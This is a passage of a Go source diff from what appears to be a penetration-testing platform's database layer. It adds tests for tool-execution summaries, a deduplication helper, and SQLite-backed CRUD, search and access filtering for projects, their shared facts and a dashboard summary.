filepath.Join(dir, "2.json") + if err := os.WriteFile(newPath, []byte(`{"id":"2","subject":"本轮任务","status":"pending"}`), 0o644); err != nil { + t.Fatalf("WriteFile(new): %v", err) + } + tasks, err = db.ListConversationPlanTasksSince("conversation-current-run", runStartedAt) + if err != nil { + t.Fatalf("ListConversationPlanTasksSince(after TaskCreate): %v", err) + } + if len(tasks) != 1 || tasks[0].ID != "2" { + t.Fatalf("current tasks = %#v, want task 2 only", tasks) + } +} diff --git a/internal/database/process_detail_dedupe.go b/internal/database/process_detail_dedupe.go new file mode 100644 index 00000000..8faa11d3 --- /dev/null +++ b/internal/database/process_detail_dedupe.go @@ -0,0 +1,28 @@ +package database + +import ( + "fmt" + "strings" +) + +// DedupeConsecutiveProcessDetails 去掉相邻且语义相同的过程详情(使用 DB 中 data 列原始 JSON 作指纹,避免 map 序列化键序不稳定)。 +func DedupeConsecutiveProcessDetails(rows []ProcessDetail) []ProcessDetail { + if len(rows) < 2 { + return rows + } + out := make([]ProcessDetail, 0, len(rows)) + var lastKey string + for _, d := range rows { + key := processDetailRowKey(d) + if len(out) > 0 && key != "" && key == lastKey { + continue + } + out = append(out, d) + lastKey = key + } + return out +} + +func processDetailRowKey(d ProcessDetail) string { + return fmt.Sprintf("%s\x00%s\x00%s", d.EventType, strings.TrimSpace(d.Message), d.Data) +} diff --git a/internal/database/process_details_summary_test.go b/internal/database/process_details_summary_test.go new file mode 100644 index 00000000..200f6b7d --- /dev/null +++ b/internal/database/process_details_summary_test.go @@ -0,0 +1,182 @@ +package database + +import ( + "path/filepath" + "testing" + "time" + + "go.uber.org/zap" +) + +func TestProcessDetailsSummaryDoesNotGuessIDLessResultsByOrder(t *testing.T) { + db, conversationID, messageID := setupProcessDetailsSummaryTest(t) + for _, id := range []string{"call-1", "call-2", "call-3", "call-4"} { + if err := db.AddProcessDetail(messageID, conversationID, "tool_call", "call", map[string]interface{}{ + "toolName": "http-framework-test", "toolCallId": id, + }); err != nil { + t.Fatalf("AddProcessDetail(tool_call): %v", err) + } + } + results := []map[string]interface{}{ + {"toolName": "http-framework-test", "toolCallId": "call-1", "success": true}, + {"toolName": "http-framework-test", "toolCallId": "call-2", "success": true}, + {"toolName": "http-framework-test", "success": true}, + {"toolName": "http-framework-test", "success": true}, + } + var resultIDs []string + for _, result := range results { + resultID, err := db.AddProcessDetailWithID(messageID, conversationID, "tool_result", "result", result) + if err != nil { + t.Fatalf("AddProcessDetail(tool_result): %v", err) + } + resultIDs = append(resultIDs, resultID) + } + + summary, err := db.GetProcessDetailsSummary(messageID) + if err != nil { + t.Fatalf("GetProcessDetailsSummary: %v", err) + } + if len(summary.ToolExecutions) != 6 { + t.Fatalf("tool executions = %d, want 6", len(summary.ToolExecutions)) + } + for i, execution := range summary.ToolExecutions[:2] { + if execution.Status != "completed" { + t.Fatalf("execution %d status = %q, want completed", i, execution.Status) + } + if execution.ResultDetailID != resultIDs[i] { + t.Fatalf("execution %d result detail id = %q, want %q", i, execution.ResultDetailID, resultIDs[i]) + } + } + for i, execution := range summary.ToolExecutions[2:4] { + if execution.Status != "result_missing" { + t.Fatalf("unmatched call %d status = %q, want result_missing", i, execution.Status) + } + } + for i, execution := range summary.ToolExecutions[4:] { + if execution.Status != "completed" || execution.ToolCallID != "" { + t.Fatalf("idless result %d = %#v, want separate completed result without toolCallId", i, execution) + } + } +} + +func TestProcessDetailsSummaryPairsRepeatedToolCallIDsFIFO(t *testing.T) { + db, conversationID, messageID := setupProcessDetailsSummaryTest(t) + for i := 0; i < 2; i++ { + if err := db.AddProcessDetail(messageID, conversationID, "tool_call", "call", map[string]interface{}{ + "toolName": "execute", "toolCallId": "legacy-reused-id", + }); err != nil { + t.Fatalf("AddProcessDetail(tool_call): %v", err) + } + } + for i := 0; i < 2; i++ { + if err := db.AddProcessDetail(messageID, conversationID, "tool_result", "result", map[string]interface{}{ + "toolName": "execute", "toolCallId": "legacy-reused-id", "success": true, + }); err != nil { + t.Fatalf("AddProcessDetail(tool_result): %v", err) + } + } + + summary, err := db.GetProcessDetailsSummary(messageID) + if err != nil { + t.Fatalf("GetProcessDetailsSummary: %v", err) + } + if len(summary.ToolExecutions) != 2 { + t.Fatalf("tool executions = %d, want 2", len(summary.ToolExecutions)) + } + for i, execution := range summary.ToolExecutions { + if execution.Status != "completed" { + t.Fatalf("execution %d status = %q, want completed", i, execution.Status) + } + } +} + +func TestProcessDetailsSummaryDoesNotReportPersistedOrphanAsRunning(t *testing.T) { + db, conversationID, messageID := setupProcessDetailsSummaryTest(t) + if err := db.AddProcessDetail(messageID, conversationID, "tool_call", "call", map[string]interface{}{ + "toolName": "execute", "toolCallId": "orphan", + }); err != nil { + t.Fatalf("AddProcessDetail(tool_call): %v", err) + } + summary, err := db.GetProcessDetailsSummary(messageID) + if err != nil { + t.Fatalf("GetProcessDetailsSummary: %v", err) + } + if len(summary.ToolExecutions) != 1 || summary.ToolExecutions[0].Status != "result_missing" { + t.Fatalf("tool executions = %#v, want result_missing", summary.ToolExecutions) + } +} + +func TestProcessDetailsSummaryIncludesPersistedTurnTiming(t *testing.T) { + db, _, messageID := setupProcessDetailsSummaryTest(t) + startedAt := "2026-08-10T08:00:00Z" + completedAt := "2026-08-10T08:12:59Z" + if _, err := db.Exec( + "UPDATE messages SET content = ?, created_at = ?, updated_at = ? WHERE id = ?", + "done", startedAt, completedAt, messageID, + ); err != nil { + t.Fatalf("update message timing: %v", err) + } + + summary, err := db.GetProcessDetailsSummary(messageID) + if err != nil { + t.Fatalf("GetProcessDetailsSummary: %v", err) + } + if summary.Status != "completed" { + t.Fatalf("status = %q, want completed", summary.Status) + } + if summary.StartedAt == nil || summary.CompletedAt == nil { + t.Fatalf("timing missing: %#v", summary) + } + if want := int64((12*time.Minute + 59*time.Second) / time.Millisecond); summary.DurationMs != want { + t.Fatalf("durationMs = %d, want %d", summary.DurationMs, want) + } +} + +func TestProcessDetailsSummaryTreatsCancelledPlaceholderAsTerminal(t *testing.T) { + db, conversationID, messageID := setupProcessDetailsSummaryTest(t) + startedAt := "2026-08-10T08:00:00Z" + if _, err := db.Exec( + "UPDATE messages SET content = ?, created_at = ?, updated_at = ? WHERE id = ?", + "处理中...", startedAt, startedAt, messageID, + ); err != nil { + t.Fatalf("update running placeholder: %v", err) + } + if _, err := db.Exec(` +INSERT INTO process_details (id, message_id, conversation_id, event_type, message, data, created_at) +VALUES ('cancelled-detail', ?, ?, 'cancelled', 'interrupted', '{}', '2026-08-10T08:02:05Z')`, + messageID, conversationID); err != nil { + t.Fatalf("insert cancelled detail: %v", err) + } + + summary, err := db.GetProcessDetailsSummary(messageID) + if err != nil { + t.Fatalf("GetProcessDetailsSummary: %v", err) + } + if summary.Status != "cancelled" { + t.Fatalf("status = %q, want cancelled", summary.Status) + } + if summary.CompletedAt == nil { + t.Fatal("cancelled summary should expose a fixed completion time") + } + if want := int64((2*time.Minute + 5*time.Second) / time.Millisecond); summary.DurationMs != want { + t.Fatalf("durationMs = %d, want %d", summary.DurationMs, want) + } +} + +func setupProcessDetailsSummaryTest(t *testing.T) (*DB, string, string) { + t.Helper() + db, err := NewDB(filepath.Join(t.TempDir(), "process-details.db"), zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + t.Cleanup(func() { _ = db.Close() }) + conversation, err := db.CreateConversation("process details", ConversationCreateMeta{}) + if err != nil { + t.Fatalf("CreateConversation: %v", err) + } + message, err := db.AddMessage(conversation.ID, "assistant", "done", nil) + if err != nil { + t.Fatalf("AddMessage: %v", err) + } + return db, conversation.ID, message.ID +} diff --git a/internal/database/project.go b/internal/database/project.go new file mode 100644 index 00000000..c2201267 --- /dev/null +++ b/internal/database/project.go @@ -0,0 +1,635 @@ +package database + +import ( + "database/sql" + "fmt" + "regexp" + "strings" + "time" + + "github.com/google/uuid" +) + +var factKeyPattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9._/-]*$`) + +// ValidateFactKey 校验事实 key(项目内唯一标识)。 +func ValidateFactKey(key string) error { + key = strings.TrimSpace(key) + if key == "" { + return fmt.Errorf("fact_key 不能为空") + } + if len(key) > 128 { + return fmt.Errorf("fact_key 过长(最多 128 字符)") + } + if !factKeyPattern.MatchString(key) { + return fmt.Errorf("fact_key 格式无效,仅允许字母、数字及 . _ / -,且须以字母或数字开头(支持驼峰命名)") + } + return nil +} + +// Project 渗透测试项目(跨对话共享黑板)。 +type Project struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description,omitempty"` + ScopeJSON string `json:"scope_json,omitempty"` + Status string `json:"status"` // active | archived + Pinned bool `json:"pinned"` + CreatedAt time.Time `json:"created_at"` + UpdatedAt time.Time `json:"updated_at"` +} + +// ProjectFact 项目事实(黑板条目)。 +type ProjectFact struct { + ID string `json:"id"` + ProjectID string `json:"project_id"` + FactKey string `json:"fact_key"` + Category string `json:"category"` + Summary string `json:"summary"` + Body string `json:"body"` + Confidence string `json:"confidence"` // confirmed | tentative | deprecated + SourceConversationID string `json:"source_conversation_id,omitempty"` + SourceMessageID string `json:"source_message_id,omitempty"` + Pinned bool `json:"pinned"` + RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"` + CreatedAt time.Time `json:"created_at"` + UpdatedAt time.Time `json:"updated_at"` +} + +// ProjectFactListFilter 事实列表筛选。 +type ProjectFactListFilter struct { + Category string + Confidence string + Search string + RelatedVulnerabilityID string + ExcludeDeprecated bool // 为 true 时排除 confidence=deprecated +} + +// CreateProject 创建项目。 +func (db *DB) CreateProject(p *Project) (*Project, error) { + if p.ID == "" { + p.ID = uuid.New().String() + } + if strings.TrimSpace(p.Status) == "" { + p.Status = "active" + } + now := time.Now() + if p.CreatedAt.IsZero() { + p.CreatedAt = now + } + p.UpdatedAt = now + + _, err := db.Exec( + `INSERT INTO projects (id, name, description, scope_json, status, pinned, created_at, updated_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?)`, + p.ID, p.Name, p.Description, p.ScopeJSON, p.Status, boolToInt(p.Pinned), p.CreatedAt, p.UpdatedAt, + ) + if err != nil { + return nil, fmt.Errorf("创建项目失败: %w", err) + } + return p, nil +} + +// GetProject 获取项目。 +func (db *DB) GetProject(id string) (*Project, error) { + var p Project + var pinned int + var createdAt, updatedAt string + err := db.QueryRow( + `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at + FROM projects WHERE id = ?`, id, + ).Scan(&p.ID, &p.Name, &p.Description, &p.ScopeJSON, &p.Status, &pinned, &createdAt, &updatedAt) + if err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("项目不存在") + } + return nil, fmt.Errorf("获取项目失败: %w", err) + } + p.Pinned = pinned != 0 + p.CreatedAt = parseDBTime(createdAt) + p.UpdatedAt = parseDBTime(updatedAt) + return &p, nil +} + +// GetProjectName returns a project display name without loading the full record. +func (db *DB) GetProjectName(id string) (string, error) { + var name string + err := db.QueryRow(`SELECT name FROM projects WHERE id = ?`, id).Scan(&name) + if err != nil { + if err == sql.ErrNoRows { + return "", fmt.Errorf("项目不存在") + } + return "", fmt.Errorf("获取项目名称失败: %w", err) + } + return strings.TrimSpace(name), nil +} + +func projectListSearchPattern(q string) string { + q = strings.TrimSpace(q) + if q == "" { + return "" + } + var b strings.Builder + b.WriteByte('%') + for _, r := range q { + switch r { + case '%', '_', '\\': + b.WriteByte('\\') + b.WriteRune(r) + default: + b.WriteRune(r) + } + } + b.WriteByte('%') + return b.String() +} + +func appendProjectListFilters(query string, args []interface{}, status, search string) (string, []interface{}) { + if s := strings.TrimSpace(status); s != "" { + query += " AND status = ?" + args = append(args, s) + } + if pattern := projectListSearchPattern(search); pattern != "" { + query += ` AND (LOWER(name) LIKE LOWER(?) ESCAPE '\' OR LOWER(COALESCE(description,'')) LIKE LOWER(?) ESCAPE '\' OR LOWER(id) LIKE LOWER(?) ESCAPE '\')` + args = append(args, pattern, pattern, pattern) + } + return query, args +} + +func appendProjectAccessFilter(query string, args []interface{}, userID, scope string) (string, []interface{}) { + userID = strings.TrimSpace(userID) + if userID == "" || scope == RBACScopeAll { + return query, args + } + query += ` AND (owner_user_id = ? OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'project' AND ra.resource_id = projects.id + ))` + args = append(args, userID, userID) + return query, args +} + +// CountProjects 统计项目数量。 +func (db *DB) CountProjects(status, search string) (int, error) { + query := `SELECT COUNT(*) FROM projects WHERE 1=1` + args := []interface{}{} + query, args = appendProjectListFilters(query, args, status, search) + var count int + if err := db.QueryRow(query, args...).Scan(&count); err != nil { + return 0, fmt.Errorf("统计项目失败: %w", err) + } + return count, nil +} + +func (db *DB) CountProjectsForAccess(status, search, userID, scope string) (int, error) { + query := `SELECT COUNT(*) FROM projects WHERE 1=1` + args := []interface{}{} + query, args = appendProjectListFilters(query, args, status, search) + query, args = appendProjectAccessFilter(query, args, userID, scope) + var count int + if err := db.QueryRow(query, args...).Scan(&count); err != nil { + return 0, fmt.Errorf("统计项目失败: %w", err) + } + return count, nil +} + +// ListProjects 列出项目。 +func (db *DB) ListProjects(status, search string, limit, offset int) ([]*Project, error) { + if limit <= 0 { + limit = 50 + } + query := `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at + FROM projects WHERE 1=1` + args := []interface{}{} + query, args = appendProjectListFilters(query, args, status, search) + query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?" + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("列出项目失败: %w", err) + } + defer rows.Close() + + var out []*Project + for rows.Next() { + var p Project + var pinned int + var createdAt, updatedAt string + if err := rows.Scan(&p.ID, &p.Name, &p.Description, &p.ScopeJSON, &p.Status, &pinned, &createdAt, &updatedAt); err != nil { + return nil, err + } + p.Pinned = pinned != 0 + p.CreatedAt = parseDBTime(createdAt) + p.UpdatedAt = parseDBTime(updatedAt) + out = append(out, &p) + } + return out, rows.Err() +} + +func (db *DB) ListProjectsForAccess(status, search string, limit, offset int, userID, scope string) ([]*Project, error) { + if scope == RBACScopeAll || strings.TrimSpace(userID) == "" { + return db.ListProjects(status, search, limit, offset) + } + if limit <= 0 { + limit = 50 + } + query := `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at + FROM projects WHERE 1=1` + args := []interface{}{} + query, args = appendProjectListFilters(query, args, status, search) + query, args = appendProjectAccessFilter(query, args, userID, scope) + query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?" + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("列出项目失败: %w", err) + } + defer rows.Close() + var out []*Project + for rows.Next() { + var p Project + var pinned int + var createdAt, updatedAt string + if err := rows.Scan(&p.ID, &p.Name, &p.Description, &p.ScopeJSON, &p.Status, &pinned, &createdAt, &updatedAt); err != nil { + return nil, err + } + p.Pinned = pinned != 0 + p.CreatedAt = parseDBTime(createdAt) + p.UpdatedAt = parseDBTime(updatedAt) + out = append(out, &p) + } + return out, rows.Err() +} + +// UpdateProject 更新项目。 +func (db *DB) UpdateProject(p *Project) error { + p.UpdatedAt = time.Now() + _, err := db.Exec( + `UPDATE projects SET name = ?, description = ?, scope_json = ?, status = ?, pinned = ?, updated_at = ? WHERE id = ?`, + p.Name, p.Description, p.ScopeJSON, p.Status, boolToInt(p.Pinned), p.UpdatedAt, p.ID, + ) + if err != nil { + return fmt.Errorf("更新项目失败: %w", err) + } + return nil +} + +// DeleteProject 删除项目(级联删除事实;对话 project_id 置空由 FK 处理;其他资源 project_id 置空)。 +func (db *DB) DeleteProject(id string) error { + if _, err := db.Exec(`UPDATE vulnerabilities SET project_id = NULL WHERE project_id = ?`, id); err != nil { + return fmt.Errorf("解除漏洞项目关联失败: %w", err) + } + if _, err := db.Exec(`UPDATE assets SET project_id = NULL WHERE project_id = ?`, id); err != nil { + return fmt.Errorf("解除资产项目关联失败: %w", err) + } + if _, err := db.Exec(`UPDATE webshell_connections SET project_id = NULL WHERE project_id = ?`, id); err != nil { + return fmt.Errorf("解除 WebShell 项目关联失败: %w", err) + } + if _, err := db.Exec(`UPDATE c2_listeners SET project_id = NULL WHERE project_id = ?`, id); err != nil { + return fmt.Errorf("解除 C2 监听器项目关联失败: %w", err) + } + _, err := db.Exec(`DELETE FROM projects WHERE id = ?`, id) + if err != nil { + return fmt.Errorf("删除项目失败: %w", err) + } + db.removeProjectScopedDirs(id) + return nil +} + +// GetConversationProjectID 返回对话绑定的项目 ID。 +func (db *DB) GetConversationProjectID(conversationID string) (string, error) { + var pid sql.NullString + err := db.QueryRow(`SELECT project_id FROM conversations WHERE id = ?`, conversationID).Scan(&pid) + if err != nil { + if err == sql.ErrNoRows { + return "", fmt.Errorf("对话不存在") + } + return "", err + } + if pid.Valid { + return strings.TrimSpace(pid.String), nil + } + return "", nil +} + +// SetConversationProjectID 设置对话所属项目(空字符串表示解除绑定)。 +func (db *DB) SetConversationProjectID(conversationID, projectID string) error { + projectID = strings.TrimSpace(projectID) + if projectID != "" { + if _, err := db.GetProject(projectID); err != nil { + return err + } + } + var val interface{} + if projectID == "" { + val = nil + } else { + val = projectID + } + _, err := db.Exec(`UPDATE conversations SET project_id = ?, updated_at = ? WHERE id = ?`, val, time.Now(), conversationID) + if err != nil { + return fmt.Errorf("设置对话项目失败: %w", err) + } + return nil +} + +// ListProjectFactsForIndex 列出用于黑板索引注入的事实(不含 deprecated,除非 includeDeprecated)。 +func (db *DB) ListProjectFactsForIndex(projectID string, includeDeprecated bool) ([]*ProjectFact, error) { + query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, + COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, + COALESCE(related_vulnerability_id,''), created_at, updated_at + FROM project_facts WHERE project_id = ?` + args := []interface{}{projectID} + if !includeDeprecated { + query += " AND confidence != 'deprecated'" + } + query += " ORDER BY pinned DESC, updated_at DESC" + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + return scanProjectFacts(rows) +} + +// ListProjectFacts 分页列出项目事实。 +func (db *DB) ListProjectFacts(projectID string, filter ProjectFactListFilter, limit, offset int) ([]*ProjectFact, error) { + if limit <= 0 { + limit = 100 + } + query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, + COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, + COALESCE(related_vulnerability_id,''), created_at, updated_at + FROM project_facts WHERE project_id = ?` + args := []interface{}{projectID} + if c := strings.TrimSpace(filter.Category); c != "" { + query += " AND category = ?" + args = append(args, c) + } + if c := strings.TrimSpace(filter.Confidence); c != "" { + query += " AND confidence = ?" + args = append(args, c) + } + if filter.ExcludeDeprecated { + query += " AND confidence != 'deprecated'" + } + if rid := strings.TrimSpace(filter.RelatedVulnerabilityID); rid != "" { + query += " AND related_vulnerability_id = ?" + args = append(args, rid) + } + if s := strings.TrimSpace(filter.Search); s != "" { + pat := "%" + s + "%" + query += " AND (fact_key LIKE ? OR summary LIKE ? OR body LIKE ?)" + args = append(args, pat, pat, pat) + } + query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?" + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + return scanProjectFacts(rows) +} + +// GetProjectFactByKey 按 key 获取事实。 +func (db *DB) GetProjectFactByKey(projectID, factKey string) (*ProjectFact, error) { + row := db.QueryRow( + `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, + COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, + COALESCE(related_vulnerability_id,''), created_at, updated_at + FROM project_facts WHERE project_id = ? AND fact_key = ?`, + projectID, factKey, + ) + return scanProjectFactRow(row) +} + +// GetProjectFact 按 ID 获取事实。 +func (db *DB) GetProjectFact(id string) (*ProjectFact, error) { + row := db.QueryRow( + `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence, + COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned, + COALESCE(related_vulnerability_id,''), created_at, updated_at + FROM project_facts WHERE id = ?`, id, + ) + return scanProjectFactRow(row) +} + +// mergeFactBodyOnUpdate 更新时若 incoming body 为空则保留已有内容,避免仅改 summary 时丢失攻击链。 +func mergeFactBodyOnUpdate(incoming, existing string) string { + if strings.TrimSpace(incoming) == "" { + return existing + } + return incoming +} + +// UpsertProjectFact 创建或更新事实(按 project_id + fact_key)。 +func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) { + if err := ValidateFactKey(f.FactKey); err != nil { + return nil, err + } + if strings.TrimSpace(f.Category) == "" { + f.Category = "note" + } + if strings.TrimSpace(f.Confidence) == "" { + f.Confidence = "tentative" + } + now := time.Now() + + existing, err := db.GetProjectFactByKey(f.ProjectID, f.FactKey) + if err == nil && existing != nil { + f.ID = existing.ID + f.CreatedAt = existing.CreatedAt + f.UpdatedAt = now + f.Body = mergeFactBodyOnUpdate(f.Body, existing.Body) + if strings.TrimSpace(f.Category) == "" { + f.Category = existing.Category + } + if strings.TrimSpace(f.Confidence) == "" { + f.Confidence = existing.Confidence + } + _, err = db.Exec( + `UPDATE project_facts SET category = ?, summary = ?, body = ?, confidence = ?, + source_conversation_id = COALESCE(?, source_conversation_id), + source_message_id = COALESCE(?, source_message_id), + pinned = ?, related_vulnerability_id = ?, updated_at = ? + WHERE id = ?`, + f.Category, f.Summary, f.Body, f.Confidence, + nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned), + nullIfEmpty(f.RelatedVulnerabilityID), f.UpdatedAt, f.ID, + ) + if err != nil { + return nil, fmt.Errorf("更新事实失败: %w", err) + } + return f, nil + } + + if f.ID == "" { + f.ID = uuid.New().String() + } + f.CreatedAt = now + f.UpdatedAt = now + _, err = db.Exec( + `INSERT INTO project_facts ( + id, project_id, fact_key, category, summary, body, confidence, + source_conversation_id, source_message_id, pinned, related_vulnerability_id, + created_at, updated_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`, + f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence, + nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned), + nullIfEmpty(f.RelatedVulnerabilityID), + f.CreatedAt, f.UpdatedAt, + ) + if err != nil { + return nil, fmt.Errorf("创建事实失败: %w", err) + } + return f, nil +} + +// DeprecateProjectFact 将事实标记为 deprecated(关联边同步 deprecated)。 +func (db *DB) DeprecateProjectFact(projectID, factKey string) error { + res, err := db.Exec( + `UPDATE project_facts SET confidence = 'deprecated', updated_at = ? WHERE project_id = ? AND fact_key = ?`, + time.Now(), projectID, factKey, + ) + if err != nil { + return err + } + n, _ := res.RowsAffected() + if n == 0 { + return fmt.Errorf("事实不存在") + } + return db.DeprecateProjectFactEdgesForKey(projectID, factKey) +} + +// RestoreProjectFact 将已废弃事实恢复为 tentative 或 confirmed(重新参与黑板索引)。 +func (db *DB) RestoreProjectFact(projectID, factKey, confidence string) error { + confidence = strings.TrimSpace(strings.ToLower(confidence)) + if confidence == "" { + confidence = "tentative" + } + if confidence != "confirmed" && confidence != "tentative" { + return fmt.Errorf("confidence 须为 confirmed 或 tentative") + } + + existing, err := db.GetProjectFactByKey(projectID, factKey) + if err != nil { + return fmt.Errorf("事实不存在") + } + if strings.ToLower(strings.TrimSpace(existing.Confidence)) != "deprecated" { + return fmt.Errorf("事实未处于废弃状态") + } + + _, err = db.Exec( + `UPDATE project_facts SET confidence = ?, updated_at = ? WHERE project_id = ? AND fact_key = ?`, + confidence, time.Now(), projectID, factKey, + ) + return err +} + +// DeleteProjectFact 删除事实(级联删除相关边)。 +func (db *DB) DeleteProjectFact(id string) error { + f, err := db.GetProjectFact(id) + if err != nil { + return err + } + if err := db.DeleteProjectFactEdgesForKey(f.ProjectID, f.FactKey); err != nil { + return err + } + _, err = db.Exec(`DELETE FROM project_facts WHERE id = ?`, id) + return err +} + +func scanProjectFacts(rows *sql.Rows) ([]*ProjectFact, error) { + var out []*ProjectFact + for rows.Next() { + f, err := scanProjectFactFromRows(rows) + if err != nil { + return nil, err + } + out = append(out, f) + } + return out, rows.Err() +} + +func scanProjectFactRow(row *sql.Row) (*ProjectFact, error) { + var f ProjectFact + var pinned int + var createdAt, updatedAt string + err := row.Scan( + &f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence, + &f.SourceConversationID, &f.SourceMessageID, &pinned, + &f.RelatedVulnerabilityID, &createdAt, &updatedAt, + ) + if err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("事实不存在") + } + return nil, err + } + f.Pinned = pinned != 0 + f.CreatedAt = parseDBTime(createdAt) + f.UpdatedAt = parseDBTime(updatedAt) + return &f, nil +} + +func scanProjectFactFromRows(rows *sql.Rows) (*ProjectFact, error) { + var f ProjectFact + var pinned int + var createdAt, updatedAt string + err := rows.Scan( + &f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence, + &f.SourceConversationID, &f.SourceMessageID, &pinned, + &f.RelatedVulnerabilityID, &createdAt, &updatedAt, + ) + if err != nil { + return nil, err + } + f.Pinned = pinned != 0 + f.CreatedAt = parseDBTime(createdAt) + f.UpdatedAt = parseDBTime(updatedAt) + return &f, nil +} + +func boolToInt(b bool) int { + if b { + return 1 + } + return 0 +} + +func nullIfEmpty(s string) interface{} { + if strings.TrimSpace(s) == "" { + return nil + } + return s +} + +func parseDBTime(s string) time.Time { + s = strings.TrimSpace(s) + if s == "" { + return time.Time{} + } + // go-sqlite3 读 DATETIME 常返回 RFC3339(含 T),写入时可能是空格分隔格式,需兼容多种形态 + layouts := []string{ + time.RFC3339Nano, + time.RFC3339, + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05-07:00", + "2006-01-02T15:04:05.999999999-07:00", + "2006-01-02T15:04:05-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02 15:04:05", + "2006-01-02T15:04:05.999999999", + "2006-01-02T15:04:05", + } + for _, layout := range layouts { + if t, e := time.Parse(layout, s); e == nil { + return t + } + } + return time.Time{} +} diff --git a/internal/database/project_dashboard.go b/internal/database/project_dashboard.go new file mode 100644 index 00000000..0a3bdbda --- /dev/null +++ b/internal/database/project_dashboard.go @@ -0,0 +1,112 @@ +package database + +import ( + "fmt" + "strings" + "time" +) + +// ProjectDashboardFact 仪表盘跨项目近期事实条目。 +type ProjectDashboardFact struct { + ID string `json:"id"` + ProjectID string `json:"project_id"` + ProjectName string `json:"project_name"` + FactKey string `json:"fact_key"` + Category string `json:"category"` + Summary string `json:"summary"` + Confidence string `json:"confidence"` + Pinned bool `json:"pinned"` + UpdatedAt time.Time `json:"updated_at"` +} + +// ProjectDashboardTotals 仪表盘项目事实汇总计数。 +type ProjectDashboardTotals struct { + ActiveProjects int `json:"active_projects"` + TotalFacts int `json:"total_facts"` +} + +// ProjectDashboardSummary 仪表盘项目情报摘要。 +type ProjectDashboardSummary struct { + RecentFacts []ProjectDashboardFact `json:"recent_facts"` + Totals ProjectDashboardTotals `json:"totals"` +} + +// GetProjectDashboardSummary 聚合跨项目近期事实(仅活跃项目、排除 deprecated)。 +func (db *DB) GetProjectDashboardSummary(factLimit int) (*ProjectDashboardSummary, error) { + return db.GetProjectDashboardSummaryForAccess(factLimit, "", "") +} + +func (db *DB) GetProjectDashboardSummaryForAccess(factLimit int, userID, scope string) (*ProjectDashboardSummary, error) { + if factLimit <= 0 { + factLimit = 5 + } + if factLimit > 50 { + factLimit = 50 + } + + out := &ProjectDashboardSummary{ + RecentFacts: []ProjectDashboardFact{}, + } + + projectAccess := "" + args := []interface{}{} + userID = strings.TrimSpace(userID) + if userID != "" && scope != RBACScopeAll { + projectAccess = ` AND ( + p.owner_user_id = ? + OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'project' AND ra.resource_id = p.id + ) + )` + args = append(args, userID, userID) + } + + if err := db.QueryRow(`SELECT COUNT(*) FROM projects p WHERE p.status = 'active'`+projectAccess, args...).Scan(&out.Totals.ActiveProjects); err != nil { + return nil, fmt.Errorf("统计活跃项目失败: %w", err) + } + if err := db.QueryRow( + `SELECT COUNT(*) FROM project_facts f + INNER JOIN projects p ON p.id = f.project_id + WHERE f.confidence != 'deprecated' AND p.status = 'active'`+projectAccess, + args..., + ).Scan(&out.Totals.TotalFacts); err != nil { + return nil, fmt.Errorf("统计事实失败: %w", err) + } + + queryArgs := append([]interface{}{}, args...) + queryArgs = append(queryArgs, factLimit) + rows, err := db.Query( + `SELECT f.id, f.project_id, p.name, f.fact_key, f.category, f.summary, f.confidence, f.pinned, f.updated_at + FROM project_facts f + INNER JOIN projects p ON p.id = f.project_id + WHERE f.confidence != 'deprecated' AND p.status = 'active'`+projectAccess+` + ORDER BY f.pinned DESC, f.updated_at DESC + LIMIT ?`, + queryArgs..., + ) + if err != nil { + return nil, fmt.Errorf("查询近期事实失败: %w", err) + } + defer rows.Close() + + for rows.Next() { + var item ProjectDashboardFact + var pinned int + var updatedAt string + if err := rows.Scan( + &item.ID, &item.ProjectID, &item.ProjectName, &item.FactKey, + &item.Category, &item.Summary, &item.Confidence, &pinned, &updatedAt, + ); err != nil { + return nil, err + } + item.Pinned = pinned != 0 + item.ProjectName = strings.TrimSpace(item.ProjectName) + item.UpdatedAt = parseDBTime(updatedAt) + out.RecentFacts = append(out.RecentFacts, item) + } + if err := rows.Err(); err != nil { + return nil, err + } + return 